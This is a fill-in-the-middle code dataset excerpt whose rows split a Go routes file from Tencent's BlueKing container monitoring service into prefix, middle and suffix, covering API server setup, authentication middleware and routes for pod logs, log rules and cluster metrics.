file_name large_stringlengths 4 140 | prefix large_stringlengths 0 39k | suffix large_stringlengths 0 36.1k | middle large_stringlengths 0 29.4k | fim_type large_stringclasses 4
values |
|---|---|---|---|---|
routes.go | /*
* Tencent is pleased to support the open source community by making Blueking Container Service available.
* Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
* http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under
* the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package api
import (
"context"
"encoding/json"
"net/http"
"path"
"github.com/Tencent/bk-bcs/bcs-common/common/tcp/listener"
ginTracing "github.com/Tencent/bk-bcs/bcs-common/pkg/otel/trace/gin"
"github.com/TencentBlueKing/bkmonitor-kits/logger"
"github.com/gin-contrib/cors"
"github.com/gin-contrib/requestid"
"github.com/gin-gonic/gin"
"github.com/prometheus/common/route"
swaggerfiles "github.com/swaggo/files"
ginSwagger "github.com/swaggo/gin-swagger"
_ "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/docs" // docs xxx
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/logrule"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/metrics"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod"
podmonitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod_monitor"
service_monitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/servicemonitor"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/telemetry"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/config"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/middleware"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/tracing"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/storegw"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/utils"
)
// APIServer :
type APIServer struct {
ctx context.Context
engine *gin.Engine
srv *http.Server
addr string
port string
addrIPv6 string
}
// NewAPIServer :
func NewAPIServer(ctx context.Context, addr, port, addrIPv6 string) (*APIServer, error) {
gin.SetMode(gin.ReleaseMode)
engine := gin.Default()
srv := &http.Server{Addr: addr, Handler: engine}
s := &APIServer{
ctx: ctx,
engine: engine,
srv: srv,
addr: addr,
port: port,
addrIPv6: addrIPv6,
}
s.newRoutes(engine)
return s, nil
}
// Run :
func (a *APIServer) Run() error {
dualStackListener := listener.NewDualStackListener()
addr := utils.GetListenAddr(a.addr, a.port)
if err := dualStackListener.AddListenerWithAddr(utils.GetListenAddr(a.addr, a.port)); err != nil {
return err
}
logger.Infow("listening for requests and metrics", "address", addr)
if a.addrIPv6 != "" && a.addrIPv6 != a.addr {
v6Addr := utils.GetListenAddr(a.addrIPv6, a.port)
if err := dualStackListener.AddListenerWithAddr(v6Addr); err != nil {
return err
}
logger.Infof("api serve dualStackListener with ipv6: %s", v6Addr)
}
return a.srv.Serve(dualStackListener)
}
// Close :
func (a *APIServer) Close() error {
return a.srv.Shutdown(a.ctx)
}
// newRoutes xxx
// @Title BCS-Monitor OpenAPI
// @BasePath /bcsapi/v4/monitor/api/projects/:projectId/clusters/:clusterId
func (a *APIServer) newRoutes(engine *gin.Engine) {
// 添加 X-Request-Id 头部
requestIdMiddleware := requestid.New(
requestid.WithGenerator(func() string {
return tracing.RequestIdGenerator()
}),
)
engine.Use(requestIdMiddleware, cors.Default())
// openapi 文档
// 访问 swagger/index.html, swagger/doc.json
engine.GET("/swagger/*any", ginSwagger.WrapHandler(swaggerfiles.Handler))
engine.GET("/-/healthy", HealthyHandler)
engine.GET("/-/ready", ReadyHandler)
// 注册 HTTP 请求
registerRoutes(engine.Group(""))
registerMetricsRoutes(engine.Group(""))
if config.G.Web.RoutePrefix != "" {
registerRoutes(engine.Group(config.G.Web.RoutePrefix))
registerMetricsRoutes(engine.Group(config.G.Web.RoutePrefix))
}
registerRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
registerMetricsRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
}
func registerRoutes(engine *gin.RouterGroup) {
// 日志相关接口
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), middleware.NsScopeAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
route := engine.Group("/projects/:projectId/clusters/:clusterId")
{
route.GET("/namespaces/:namespace/pods/:pod/containers", rest.RestHandlerFunc(pod.GetPodContainers))
route.GET("/namespaces/:namespace/pods/:pod/logs", rest.RestHandlerFunc(pod.GetPodLog))
route.GET("/namespaces/:namespace/pods/:pod/logs/download", rest.StreamHandler(pod.DownloadPodLog))
// sse 实时日志流
route.GET("/namespaces/:namespace/pods/:pod/logs/stream", rest.StreamHandler(pod.PodLogStream))
// 蓝鲸监控采集器
route.GET("/telemetry/bkmonitor_agent/", rest.STDRestHandlerFunc(telemetry.IsBKMonitorAgent))
// bk-log 日志采集规则
route.POST("/log_collector/entrypoints", rest.RestHandlerFunc(logrule.GetEntrypoints))
route.GET("/log_collector/rules", rest.RestHandlerFunc(logrule.ListLogCollectors))
route.POST("/log_collector/rules", rest.RestHandlerFunc(logrule.CreateLogRule))
route.GET("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.GetLogRule))
route.PUT("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.UpdateLogRule))
route.DELETE("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.DeleteLogRule))
route.POST("/log_collector/rules/:id/retry", rest.RestHandlerFunc(logrule.RetryLogRule))
route.POST("/log_collector/rules/:id/enable", rest.RestHandlerFunc(logrule.EnableLogRule))
route.POST("/log_collector/rules/:id/disable", rest.RestHandlerFunc(logrule.DisableLogRule))
}
}
// registerMetricsRoutes metrics 相关接口
func registerMetricsRoutes(engine *gin.RouterGroup) {
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), middleware.ProjectAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
// 命名规范
// usage 代表 百分比
// used 代表已使用
// overview, info 数值量
route := engine.Group("/metrics/projects/:projectCode/clusters/:clusterId")
{
route.GET("/overview", rest.RestHandlerFunc(metrics.GetClusterOverview))
route.GET("/cpu_usage", rest.RestHandlerFunc(metrics.ClusterCPUUsage))
route.GET("/cpu_request_usage", rest.RestHandlerFunc(metrics.ClusterCPURequestUsage))
route.GET("/memory_usage", rest.RestHandlerFunc(metrics.ClusterMemoryUsage))
route.GET("/memory_request_usage", rest.RestHandlerFunc(metrics.ClusterMemoryRequestUsage)) | route.GET("/nodes/:node/cpu_usage", rest.RestHandlerFunc(metrics.GetNodeCPUUsage))
route.GET("/nodes/:node/cpu_request_usage", rest.RestHandlerFunc(metrics.GetNodeCPURequestUsage))
route.GET("/nodes/:node/memory_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryUsage))
route.GET("/nodes/:node/memory_request_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryRequestUsage))
route.GET("/nodes/:node/network_receive", rest.RestHandlerFunc(metrics.GetNodeNetworkReceiveUsage))
route.GET("/nodes/:node/network_transmit", rest.RestHandlerFunc(metrics.GetNodeNetworkTransmitUsage))
route.GET("/nodes/:node/disk_usage", rest.RestHandlerFunc(metrics.GetNodeDiskUsage))
route.GET("/nodes/:node/diskio_usage", rest.RestHandlerFunc(metrics.GetNodeDiskioUsage))
route.POST("/namespaces/:namespace/pods/cpu_usage", rest.RestHandlerFunc(
metrics.PodCPUUsage)) // 多个Pod场景, 可能有几十,上百Pod场景, 需要使用 Post 传递参数
route.POST("/namespaces/:namespace/pods/memory_used", rest.RestHandlerFunc(metrics.PodMemoryUsed))
route.POST("/namespaces/:namespace/pods/network_receive", rest.RestHandlerFunc(metrics.PodNetworkReceive))
route.POST("/namespaces/:namespace/pods/network_transmit", rest.RestHandlerFunc(metrics.PodNetworkTransmit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_usage",
rest.RestHandlerFunc(metrics.ContainerCPUUsage))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_used",
rest.RestHandlerFunc(metrics.ContainerMemoryUsed))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_limit",
rest.RestHandlerFunc(metrics.ContainerCPULimit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_limit",
rest.RestHandlerFunc(metrics.ContainerMemoryLimit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/disk_read_total",
rest.RestHandlerFunc(metrics.ContainerDiskReadTotal))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/disk_write_total",
rest.RestHandlerFunc(metrics.ContainerDiskWriteTotal))
route.GET("/namespaces/:namespace/service_monitors",
rest.RestHandlerFunc(service_monitor.ListServiceMonitors))
route.GET("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.GetServiceMonitor))
route.POST("/namespaces/:namespace/service_monitors",
rest.RestHandlerFunc(service_monitor.CreateServiceMonitor))
route.PUT("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.UpdateServiceMonitor))
route.DELETE("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.DeleteServiceMonitor))
route.GET("/service_monitors",
rest.RestHandlerFunc(service_monitor.ListServiceMonitors))
route.POST("/service_monitors/batchdelete",
rest.RestHandlerFunc(service_monitor.BatchDeleteServiceMonitor))
route.GET("/namespaces/:namespace/pod_monitors",
rest.RestHandlerFunc(podmonitor.ListPodMonitors))
route.GET("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.GetPodMonitor))
route.POST("/namespaces/:namespace/pod_monitors",
rest.RestHandlerFunc(podmonitor.CreatePodMonitor))
route.PUT("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.UpdatePodMonitor))
route.DELETE("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.DeletePodMonitor))
route.GET("/pod_monitors",
rest.RestHandlerFunc(podmonitor.ListPodMonitors))
route.POST("/pod_monitors/batchdelete",
rest.RestHandlerFunc(podmonitor.BatchDeletePodMonitor))
}
}
// RegisterStoreGWRoutes 注册storegw http-sd
func RegisterStoreGWRoutes(gw *storegw.StoreGW) *route.Router {
router := route.New()
router.Get("/api/discovery/targetgroups", func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "application/json; charset=utf-8")
json.NewEncoder(w).Encode(gw.TargetGroups())
})
return router
}
// HealthyHandler 健康检查
func HealthyHandler(c *gin.Context) {
c.Data(http.StatusOK, "text/plain; charset=utf-8", []byte("OK"))
}
// ReadyHandler 健康检查
func ReadyHandler(c *gin.Context) {
c.Data(http.StatusOK, "text/plain; charset=utf-8", []byte("OK"))
} | route.GET("/disk_usage", rest.RestHandlerFunc(metrics.ClusterDiskUsage))
route.GET("/diskio_usage", rest.RestHandlerFunc(metrics.ClusterDiskioUsage))
route.GET("/pod_usage", rest.RestHandlerFunc(metrics.ClusterPodUsage))
route.GET("/nodes/:node/info", rest.RestHandlerFunc(metrics.GetNodeInfo))
route.GET("/nodes/:node/overview", rest.RestHandlerFunc(metrics.GetNodeOverview)) | random_line_split |
routes.go | /*
* Tencent is pleased to support the open source community by making Blueking Container Service available.
* Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
* http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under
* the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package api
import (
"context"
"encoding/json"
"net/http"
"path"
"github.com/Tencent/bk-bcs/bcs-common/common/tcp/listener"
ginTracing "github.com/Tencent/bk-bcs/bcs-common/pkg/otel/trace/gin"
"github.com/TencentBlueKing/bkmonitor-kits/logger"
"github.com/gin-contrib/cors"
"github.com/gin-contrib/requestid"
"github.com/gin-gonic/gin"
"github.com/prometheus/common/route"
swaggerfiles "github.com/swaggo/files"
ginSwagger "github.com/swaggo/gin-swagger"
_ "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/docs" // docs xxx
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/logrule"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/metrics"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod"
podmonitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod_monitor"
service_monitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/servicemonitor"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/telemetry"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/config"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/middleware"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/tracing"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/storegw"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/utils"
)
// APIServer :
type APIServer struct {
ctx context.Context
engine *gin.Engine
srv *http.Server
addr string
port string
addrIPv6 string
}
// NewAPIServer :
func NewAPIServer(ctx context.Context, addr, port, addrIPv6 string) (*APIServer, error) {
gin.SetMode(gin.ReleaseMode)
engine := gin.Default()
srv := &http.Server{Addr: addr, Handler: engine}
s := &APIServer{
ctx: ctx,
engine: engine,
srv: srv,
addr: addr,
port: port,
addrIPv6: addrIPv6,
}
s.newRoutes(engine)
return s, nil
}
// Run :
func (a *APIServer) Run() error {
dualStackListener := listener.NewDualStackListener()
addr := utils.GetListenAddr(a.addr, a.port)
if err := dualStackListener.AddListenerWithAddr(utils.GetListenAddr(a.addr, a.port)); err != nil {
return err
}
logger.Infow("listening for requests and metrics", "address", addr)
if a.addrIPv6 != "" && a.addrIPv6 != a.addr {
v6Addr := utils.GetListenAddr(a.addrIPv6, a.port)
if err := dualStackListener.AddListenerWithAddr(v6Addr); err != nil {
return err
}
logger.Infof("api serve dualStackListener with ipv6: %s", v6Addr)
}
return a.srv.Serve(dualStackListener)
}
// Close :
func (a *APIServer) Close() error {
return a.srv.Shutdown(a.ctx)
}
// newRoutes xxx
// @Title BCS-Monitor OpenAPI
// @BasePath /bcsapi/v4/monitor/api/projects/:projectId/clusters/:clusterId
func (a *APIServer) newRoutes(engine *gin.Engine) {
// 添加 X-Request-Id 头部
requestIdMiddleware := requestid.New(
requestid.WithGenerator(func() string {
return tracing.RequestIdGenerator()
}),
)
engine.Use(requestIdMiddleware, cors.Default())
// openapi 文档
// 访问 swagger/index.html, swagger/doc.json
engine.GET("/swagger/*any", ginSwagger.WrapHandler(swaggerfiles.Handler))
engine.GET("/-/healthy", HealthyHandler)
engine.GET("/-/ready", ReadyHandler)
// 注册 HTTP 请求
registerRoutes(engine.Group(""))
registerMetricsRoutes(engine.Group(""))
if config.G.Web.RoutePrefix != "" {
registerRoutes(engine.Group(config.G.Web.RoutePrefix))
registerMetricsRoutes(engine.Group(config.G.Web.RoutePrefix))
}
registerRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
registerMetricsRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
}
func registerRoutes(engine *gin.RouterGroup) {
// 日志相关接口
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), middleware.NsScopeAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
route := engine.Group("/projects/:projectId/clusters/:clusterId")
{
route.GET("/namespaces/:namespace/pods/:pod/containers", rest.RestHandlerFunc(pod.GetPodContainers))
route.GET("/namespaces/:namespace/pods/:pod/logs", rest.RestHandlerFunc(pod.GetPodLog))
route.GET("/namespaces/:namespace/pods/:pod/logs/download", rest.StreamHandler(pod.DownloadPodLog))
// sse 实时日志流
route.GET("/namespaces/:namespace/pods/:pod/logs/stream", rest.StreamHandler(pod.PodLogStream))
// 蓝鲸监控采集器
route.GET("/telemetry/bkmonitor_agent/", rest.STDRestHandlerFunc(telemetry.IsBKMonitorAgent))
// bk-log 日志采集规则
route.POST("/log_collector/entrypoints", rest.RestHandlerFunc(logrule.GetEntrypoints))
route.GET("/log_collector/rules", rest.RestHandlerFunc(logrule.ListLogCollectors))
route.POST("/log_collector/rules", rest.RestHandlerFunc(logrule.CreateLogRule))
route.GET("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.GetLogRule))
route.PUT("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.UpdateLogRule))
route.DELETE("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.DeleteLogRule))
route.POST("/log_collector/rules/:id/retry", rest.RestHandlerFunc(logrule.RetryLogRule))
route.POST("/log_collector/rules/:id/enable", rest.RestHandlerFunc(logrule.EnableLogRule))
route.POST("/log_collector/rules/:id/disable", rest.RestHandlerFunc(logrule.DisableLogRule))
}
}
// registerMetricsRoutes metrics 相关接口
func registerMetricsRoutes(engine *gin.RouterGroup) {
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), middleware.ProjectAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
// 命名规范
// usage 代表 百分比
// used 代表已使用
// overview, info 数值量
route := engine.Group("/metrics/projects/:projectCode/clusters/:clusterId")
{
route.GET("/overview", rest.RestHandlerFunc(metrics.GetClusterOverview))
route.GET("/cpu_usage", rest.RestHandlerFunc(metrics.ClusterCPUUsage))
route.GET("/cpu_request_usage", rest.RestHandlerFunc(metrics.ClusterCPURequestUsage))
route.GET("/memory_usage", rest.RestHandlerFunc(metrics.ClusterMemoryUsage))
route.GET("/memory_request_usage", rest.RestHandlerFunc(metrics.ClusterMemoryRequestUsage))
route.GET("/disk_usage", rest.RestHandlerFunc(metrics.ClusterDiskUsage))
route.GET("/diskio_usage", rest.RestHandlerFunc(metrics.ClusterDiskioUsage))
route.GET("/pod_usage", rest.RestHandlerFunc(metrics.ClusterPodUsage))
route.GET("/nodes/:node/info", rest.RestHandlerFunc(metrics.GetNodeInfo))
route.GET("/nodes/:node/overview", rest.RestHandlerFunc(metrics.GetNodeOverview))
route.GET("/nodes/:node/cpu_usage", rest.RestHandlerFunc(metrics.GetNodeCPUUsage))
route.GET("/nodes/:node/cpu_request_usage", rest.RestHandlerFunc(metrics.GetNodeCPURequestUsage))
route.GET("/nodes/:node/memory_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryUsage))
route.GET("/nodes/:node/memory_request_usage", rest.RestHandlerFunc(metrics.GetNodeMemoryRequestUsage))
route.GET("/nodes/:node/network_receive", rest.RestHandlerFunc(metrics.GetNodeNetworkReceiveUsage))
route.GET("/nodes/:node/network_transmit", rest.RestHandlerFunc(metrics.GetNodeNetworkTransmitUsage))
route.GET("/nodes/:node/disk_usage", rest.RestHandlerFunc(metrics.GetNodeDiskUsage))
route.GET("/nodes/:node/diskio_usage", rest.RestHandlerFunc(metrics.GetNodeDiskioUsage))
route.POST("/namespaces/:namespace/pods/cpu_usage", rest.RestHandlerFunc(
metrics.PodCPUUsage)) // 多个Pod场景, 可能有几十,上百Pod场景, 需要使用 Post 传递参数
route.POST("/namespaces/:namespace/pods/memory_used", rest.RestHandlerFunc(metrics.PodMemoryUsed))
route.POST("/namespaces/:namespace/pods/network_receive", rest.RestHandlerFunc(metrics.PodNetworkReceive))
route.POST("/namespaces/:namespace/pods/network_transmit", rest.RestHandlerFunc(metrics.PodNetworkTransmit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_usage",
rest.RestHandlerFunc(metrics.ContainerCPUUsage))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_used",
rest.RestHandlerFunc(metrics.ContainerMemoryUsed))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/cpu_limit",
rest.RestHandlerFunc(metrics.ContainerCPULimit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/memory_limit",
rest.RestHandlerFunc(metrics.ContainerMemoryLimit))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/disk_read_total",
rest.RestHandlerFunc(metrics.ContainerDiskReadTotal))
route.GET("/namespaces/:namespace/pods/:pod/containers/:container/disk_write_total",
rest.RestHandlerFunc(metrics.ContainerDiskWriteTotal))
route.GET("/namespaces/:namespace/service_monitors",
rest.RestHandlerFunc(service_monitor.ListServiceMonitors))
route.GET("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.GetServiceMonitor))
route.POST("/namespaces/:namespace/service_monitors",
rest.RestHandlerFunc(service_monitor.CreateServiceMonitor))
route.PUT("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.UpdateServiceMonitor))
route.DELETE("/namespaces/:namespace/service_monitors/:name",
rest.RestHandlerFunc(service_monitor.DeleteServiceMonitor))
route.GET("/service_monitors",
rest.RestHandlerFunc(service_monitor.ListServiceMonitors))
route.POST("/service_monitors/batchdelete",
rest.RestHandlerFunc(service_monitor.BatchDeleteServiceMonitor))
route.GET("/namespaces/:namespace/pod_monitors",
rest.RestHandlerFunc(podmonitor.ListPodMonitors))
route.GET("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.GetPodMonitor))
route.POST("/namespaces/:namespace/pod_monitors",
rest.RestHandlerFunc(podmonitor.CreatePodMonitor))
route.PUT("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.UpdatePodMonitor))
route.DELETE("/namespaces/:namespace/pod_monitors/:name",
rest.RestHandlerFunc(podmonitor.DeletePodMonitor))
route.GET("/pod_monitors",
rest.RestHandlerFunc(podmonitor.ListPodMonitors))
route.POST("/pod_monitors/batchdelete",
rest.RestHandlerFunc(podmonitor.BatchDeletePodMonitor))
}
}
// RegisterStoreGWRoutes 注册storegw http-sd
func RegisterStoreGWRoutes(gw *storegw.StoreGW) *route.Router {
router := route.New()
router.Get("/api/discovery/targetgroups", func(w http.ResponseWriter, r *http.R | ).Set("Content-Type", "application/json; charset=utf-8")
json.NewEncoder(w).Encode(gw.TargetGroups())
})
return router
}
// HealthyHandler 健康检查
func HealthyHandler(c *gin.Context) {
c.Data(http.StatusOK, "text/plain; charset=utf-8", []byte("OK"))
}
// ReadyHandler 健康检查
func ReadyHandler(c *gin.Context) {
c.Data(http.StatusOK, "text/plain; charset=utf-8", []byte("OK"))
}
| equest) {
w.Header( | identifier_name |
routes.go | /*
* Tencent is pleased to support the open source community by making Blueking Container Service available.
* Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
* http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under
* the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package api
import (
"context"
"encoding/json"
"net/http"
"path"
"github.com/Tencent/bk-bcs/bcs-common/common/tcp/listener"
ginTracing "github.com/Tencent/bk-bcs/bcs-common/pkg/otel/trace/gin"
"github.com/TencentBlueKing/bkmonitor-kits/logger"
"github.com/gin-contrib/cors"
"github.com/gin-contrib/requestid"
"github.com/gin-gonic/gin"
"github.com/prometheus/common/route"
swaggerfiles "github.com/swaggo/files"
ginSwagger "github.com/swaggo/gin-swagger"
_ "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/docs" // docs xxx
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/logrule"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/metrics"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod"
podmonitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/pod_monitor"
service_monitor "github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/servicemonitor"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/api/telemetry"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/config"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/middleware"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/rest/tracing"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/storegw"
"github.com/Tencent/bk-bcs/bcs-services/bcs-monitor/pkg/utils"
)
// APIServer :
type APIServer struct {
ctx context.Context
engine *gin.Engine
srv *http.Server
addr string
port string
addrIPv6 string
}
// NewAPIServer :
func NewAPIServer(ctx context.Context, addr, port, addrIPv6 string) (*APIServer, error) {
gin.SetMode(gin.ReleaseMode)
engine := gin.Default()
srv := &http.Server{Addr: addr, Handler: engine}
s := &APIServer{
ctx: ctx,
engine: engine,
srv: srv,
addr: addr,
port: port,
addrIPv6: addrIPv6,
}
s.newRoutes(engine)
return s, nil
}
// Run :
func (a *APIServer) Run() error {
dualStackListener := listener.NewDualStackListener()
addr := utils.GetListenAddr(a.addr, a.port)
if err := dualStackListener.AddListenerWithAddr(utils.GetListenAddr(a.addr, a.port)); err != nil {
return err
}
logger.Infow("listening for requests and metrics", "address", addr)
if a.addrIPv6 != "" && a.addrIPv6 != a.addr {
v6Addr := utils.GetListenAddr(a.addrIPv6, a.port)
if err := dualStackListener.AddListenerWithAddr(v6Addr); err != nil {
return err
}
logger.Infof("api serve dualStackListener with ipv6: %s", v6Addr)
}
return a.srv.Serve(dualStackListener)
}
// Close :
func (a *APIServer) Close() error {
return a.srv.Shutdown(a.ctx)
}
// newRoutes xxx
// @Title BCS-Monitor OpenAPI
// @BasePath /bcsapi/v4/monitor/api/projects/:projectId/clusters/:clusterId
func (a *APIServer) newRoutes(engine *gin.Engine) {
// 添加 X-Request-Id 头部
requestIdMiddleware := requestid.New(
requestid.WithGenerator(func() string {
return tracing.RequestIdGenerator()
}),
)
engine.Use(requestIdMiddleware, cors.Default())
// openapi 文档
// 访问 swagger/index.html, swagger/doc.json
engine.GET("/swagger/*any", ginSwagger.WrapHandler(swaggerfiles.Handler))
engine.GET("/-/healthy", HealthyHandler)
engine.GET("/-/ready", ReadyHandler)
// 注册 HTTP 请求
registerRoutes(engine.Group(""))
registerMetricsRoutes(engine.Group(""))
if config.G.Web.RoutePrefix != "" {
registerRoutes(engine.Group(config.G.Web.RoutePrefix))
registerMetricsRoutes(engine.Group(config.G.Web.RoutePrefix))
}
registerRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
registerMetricsRoutes(engine.Group(path.Join(config.G.Web.RoutePrefix, config.APIServicePrefix)))
}
func registerRoutes(engine *gin.RouterGroup) {
// 日志相关接口
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), middleware.NsScopeAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
route := engine.Group("/projects/:projectId/clusters/:clusterId")
{
route.GET("/namespaces/:namespace/pods/:pod/containers", rest.RestHandlerFunc(pod.GetPodContainers))
route.GET("/namespaces/:namespace/pods/:pod/logs", rest.RestHandlerFunc(pod.GetPodLog))
route.GET("/namespaces/:namespace/pods/:pod/logs/download", rest.StreamHandler(pod.DownloadPodLog))
// sse 实时日志流
route.GET("/namespaces/:namespace/pods/:pod/logs/stream", rest.StreamHandler(pod.PodLogStream))
// 蓝鲸监控采集器
route.GET("/telemetry/bkmonitor_agent/", rest.STDRestHandlerFunc(telemetry.IsBKMonitorAgent))
// bk-log 日志采集规则
route.POST("/log_collector/entrypoints", rest.RestHandlerFunc(logrule.GetEntrypoints))
route.GET("/log_collector/rules", rest.RestHandlerFunc(logrule.ListLogCollectors))
route.POST("/log_collector/rules", rest.RestHandlerFunc(logrule.CreateLogRule))
route.GET("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.GetLogRule))
route.PUT("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.UpdateLogRule))
route.DELETE("/log_collector/rules/:id", rest.RestHandlerFunc(logrule.DeleteLogRule))
route.POST("/log_collector/rules/:id/retry", rest.RestHandlerFunc(logrule.RetryLogRule))
route.POST("/log_collector/rules/:id/enable", rest.RestHandlerFunc(logrule.EnableLogRule))
route.POST("/log_collector/rules/:id/disable", rest.RestHandlerFunc(logrule.DisableLogRule))
}
}
// registerMetricsRoutes metrics 相关接口
func registerMetricsRoutes(engine *gin.RouterGroup) {
engine.Use(middleware.AuthenticationRequired(), middleware.ProjectParse(), m | y/targetgroups", func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "application/json; charset=utf-8")
json.NewEncoder(w).Encode(gw.TargetGroups())
})
return router
}
// HealthyHandler 健康检查
func HealthyHandler(c *gin.Context) {
c.Data(http.StatusOK, "text/plain; charset=utf-8", []byte("OK"))
}
// ReadyHandler 健康检查
func ReadyHandler(c *gin.Context) {
c.Data(http.StatusOK, "text/plain; charset=utf-8", []byte("OK"))
}
| iddleware.ProjectAuthorization())
engine.Use(ginTracing.Middleware("bcs-monitor-api"))
// 命名规范
// usage 代表 百分比
// used 代表已使用
